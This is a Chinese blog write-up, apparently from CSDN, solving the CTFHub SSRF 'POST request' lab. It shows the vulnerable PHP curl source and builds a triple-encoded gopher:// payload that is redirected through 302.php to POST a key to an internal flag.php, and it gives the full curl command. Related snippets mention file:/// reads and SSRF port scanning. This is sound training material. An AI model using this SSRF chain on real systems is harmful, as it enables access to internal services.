php curl ssrf,CTFHUB技能树-SSRF【POST请求】

最新推荐文章于 2024-05-21 22:07:05 发布
最新推荐文章于 2024-05-21 22:07:05 发布
阅读量658 收藏
点赞数 1

CTFHUB SSRF POST请求

废话

首先

开始解题

构造gopher数据

构造获取flag的请求

废话

最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。

4bb542aa002c097f7e814dd27b915beb.png

首先

我们看下题目描述,这个肯定是不能错过的。

*描述:发一个HTTP POST请求.ssrf是用php的curl实现的.并且会跟踪302跳转.

开始解题

我们打开题目,发现了flag.php 302.php index.php 三个文件。用直接访问flag.php提示我们需要从127.0.0.1访问。

于是使用http协议从127.0.0.1访问看看。

b60ddef406d30c23117056d8cad8aab8.png

查看源代码。

eadc4edbc4a1701cbd52ada123996576.png

查看302.php,发现了可以构造url用302跳转。

04b02320ea587ae9d3df72461b0c4187.png

其实这里我们还可以通过fiile://协议去读每一个文件,但是需要知道绝对路径,ctfhub的web绝对路径一般是:

/var/www/html/

flag.php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){

echo "Just View From 127.0.0.1";

return;

}

$flag=getenv("CTFHUB");

$key = md5($flag);

if(isset($_POST["key"]) && $_POST["key"] == $key){

echo $flag;

exit;

}

?>

index.php

error_reporting(0);

header("Help: here is 302.php");

if (!isset($_REQUEST['url'])){

header("Location: /?url=_");

exit;

}

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_exec($ch);

curl_close($ch);

302.php就不贴了,直接给了源代码的。

至此大概了解了本题的思路。需要我们用gopher协议通过302.php的跳转去用post key到flag.php,不过需要注意的是要从127.0.0.1发送数据。

构造gopher数据

我们首先要通过{host}:{port}/index.php?url=http://127.0.0.1/302.php去跳转gopher的协议。

gopher的数据应该是这样:

gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1

Host: 127.0.0.1:80

Content-Length: 36#特别注意此处的长度,长度不对也是不行的。

Content-Type: application/x-www-form-urlencoded

key=a96c4130c73185e519003c24968e7517 #key需要去通过127.0.0.1访问flag.php获取,也就是flag的MD5值。

以上数据包内容缺一不可

特别注意Content-Length的长度,这个字段必须有,并且长度不对也是不行的。我不会告诉你我在这里被坑了一天_

注意更改key

gopher的数据需要用url编码三次之后再发送。

gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250d%25250aHost%25253A%252520127.0.0.1%253a80%25250d%25250aContent-Length%25253a%25252036%25250d%25250aContent-Type%25253a%252520application%25252fx-www-form-urlencoded%25250d%25250a%25250d%25250akey%253defba86faaeaff11dea094633e47cd06a

构造获取flag的请求

curl -vvv 'http://challenge-de43eaec0618623b.sandbox.ctfhub.com:10080/?url=http://127.0.0.1/302.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250d%25250aHost%25253A%252520127.0.0.1%253a80%25250d%25250aContent-Length%25253a%25252036%25250d%25250aContent-Type%25253a%252520application%25252fx-www-form-urlencoded%25250d%25250a%25250d%25250akey%253defba86faaeaff11dea094633e47cd06a'

稍等片刻,flag返回。

3d68da04a5c2b51e6013f93aab439c1b.png

其实也可以用burp也一样。

d071a4b81e587169c24d9219bdd304ab.png

先结束吧,后面有时间再做下后面几题。

【持续更新】

ssrf参考:Legend__Lin’SSRF基础:Gopher协议发送Get和Post请求

weixin_36043142
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3834
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
php curl模拟post请求和提交多维数组的示例代码
12-19
下面一段代码给大家介绍php curl模拟post请求的示例代码,具体代码如下: <?php $uri = "http://www.cnblogs.com/test.php";//这里换成自己的服务器的地址 // 参数数组 $data = array ( 'name' => 'tanteng' /...
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1349
ctfhub ssrf post小记
CTFHUB技能——SSRF(一)
最新发布
2401_82985722的博客
05-21 1119
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
CTFHub-SSRF部分(已完结)
热门推荐
feng的博客
09-14 1万+
内网访问 根据题目意思,让我们如访问内网的flag.php,因此抓包进行访问,即可得到flag: 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体的用法请参考SSRF中URL的伪协议 这里我们使用file伪协议从文件系统中读取文件,我们直接抓包读取: 这里其实有点考常识了,因为网站的目录一般都在/var/ww
CTFHUB技能-SSRF【持续更新】
qq_33295410的博客
09-16 6995
CTFHUB SSRF POST请求首先开始解题构造gopher数据构造获取flag的请求 POST请求 最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先 我们看下题目描述,这个肯定是不能错过的。 描述:这次是发一个HTTP POST请求.对了.ssrf是用phpcurl实现的.并且会跟踪302跳转.我准备了一个302.php,可能对你有用哦 开始解题 我们打开题目,发现了flag.php 3
浅谈ssrf漏洞
yggcwhat
12-13 3113
简介 SSRF(Server-Side Request Forgery)服务器端请求伪造, 是攻击者构造payload通过存在漏洞的服务器去攻击内网的其他主机或者服务器。正常都是通过外网打入内网的。 漏洞产生原理 其是有这漏洞,原理上还是在代码上,举个简单的例子: <?php if (isset($_POST['url'])) { $content = file_get_contents($_POST['url']); $filename ='./file/'; file_put_co
php curl模拟post请求小实例
12-18
本机:复制代码 代码如下:<?php$uri = “http://www.a.com/test.php”;//这里换成你服务器的地址// 参数数组$data = ...curl_setopt ( $ch, CURLOPT_POST, 1 );curl_setopt ( $ch, CURLOPT_HEADER, 0 );curl_setopt
PHP使用curl函数发送Post请求的注意事项
10-21
本文将深入探讨如何使用cURL发送POST请求,以及在实际操作中需要注意的关键点。首先,我们来看一个基本的cURL POST请求示例: ```php <?php $url = 'http://example.com/api'; $data = ['key1' => 'value1', 'key2'...
PHP使用curl请求实现post方式上传图片文件功能示例
10-18
主要介绍了PHP使用curl请求实现post方式上传图片文件功能,结合实例形式分析了php使用curl进行文件传输的相关设置与使用操作技巧,需要的朋友可以参考下
PHP如何使用cURL实现Get和Post请求
10-15
主要介绍了PHP如何使用cURL实现Get和Post请求,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
CTFHubSSRF通关
m0_52923241的博客
03-30 334
内网访问 尝试访问位于127.0.0.1的flag.php吧 直接输入http://127.0.0.1/flag.php得到flag 伪协议读取文件 尝试去读取一下Web目录下的flag.php吧 利用本地文件读取协议读取到flag 输入file:///var/www/html/flag.php,看到显示??? 此时查看源代码,找到flag 端口扫描 来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦 这里提示端口范围是8000~9000,我们利用burpsuite爆破 先输入
Web漏洞之SSRF攻击汇总
小赵同学的博客
08-17 1238
SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 本文转发国光师傅的手把手带你用 SSRF 打穿内网。...
curl和gopher协议(ssrf的利用)
Z_Grant的博客
11-05 7121
文章目录一、基础知识的学习(1) cURL(2) PHPcurl函数(3) gopher协议3.1 用gopher协议get传数据3.2 用gopher协议post传数据3.3 在ssrf中使用gopher协议(4) file协议和dict协议 一、基础知识的学习 (1) cURL cURL是一个利用URL语法在命令行下工作的文件传输工具。它支持文件上传和下载,所以是综合传输工具。cURL还包...
PHP CURL CURLOPT参数说明(curl_setopt)
...
07-24 1509
CURLOPT_RETURNTRANSFER 选项: curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 如果成功只将结果返回,不自动输出任何内容。 如果失败返回FALSE curl_setopt($ch, CURLOPT_RETURNTRANSFER,0); 或着不使用这个选项: 如果成功只返回TRUE,自动输
php curlsetopt,php curl_setopt 登录 获取数据
weixin_34613462的博客
03-11 68
登录 :以51啦统计数据为例$cookfile = dirname(__FILE__)."/cookie.txt";$ip=$_SERVER["SERVER_ADDR"];$uname="帐号";$upass="密码";// 设置URL和相应的选项$HTTP_REQUEST_HEADER = array("method" => "POST","timeout" => 30,"Cont...
服务端请求伪造SSRF---curl_exec()
Ethan024的博客
04-18 1728
服务端请求伪造SSRF: 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,进而导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 攻击者----->服务器(跳板)---->目标地址 PHP中可能导致SSRF漏洞的危险函数: (1)file_get_contents(); 支持多种协议,包括http,https等。并且可以从本地和远端服务器获取资源 (2)fsockopen(); (3)curl_exec()
详解 CTF Web 中的快速反弹 POST 请求
小水池
08-11 8354
目录 0x00 前言 0x01 Python Requests 安装并导入 requests 模块 发送 GET 请求POST 请求 查看请求头 查看响应头 查看响应内容 传递 GET 请求参数 传递 POST 请求参数 传递 Cookie 参数 会话对象 Session() 0x02 writeups 【实验吧 CTF】 Web —— 天下武功唯快不破 【Bugk...
ctfhub--web--SSRF(1.内网访问2.伪协议读取文件 3.端口扫描 4.POST请求 5.文件上传 8.URL Bypass 9.数字IP Bypass) )
feiniaotjx的博客
10-10 536
ctfhub--web--SSRF1.内网访问2.伪协议读取文件3.端口扫描4.POST请求 1.内网访问 传参给url,访问一个地址文件 2.伪协议读取文件 读取网站文件 3.端口扫描 通过返回的内容判断端口是否存在 import requests try: for i in range(8000,9001): url='http://challenge-43493ad3b38edf3f.sandbox.ctfhub.com:10800/?url=127.0.0.1:'+
ctfhub web技能302跳转
07-28
CTFHub的Web技能中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值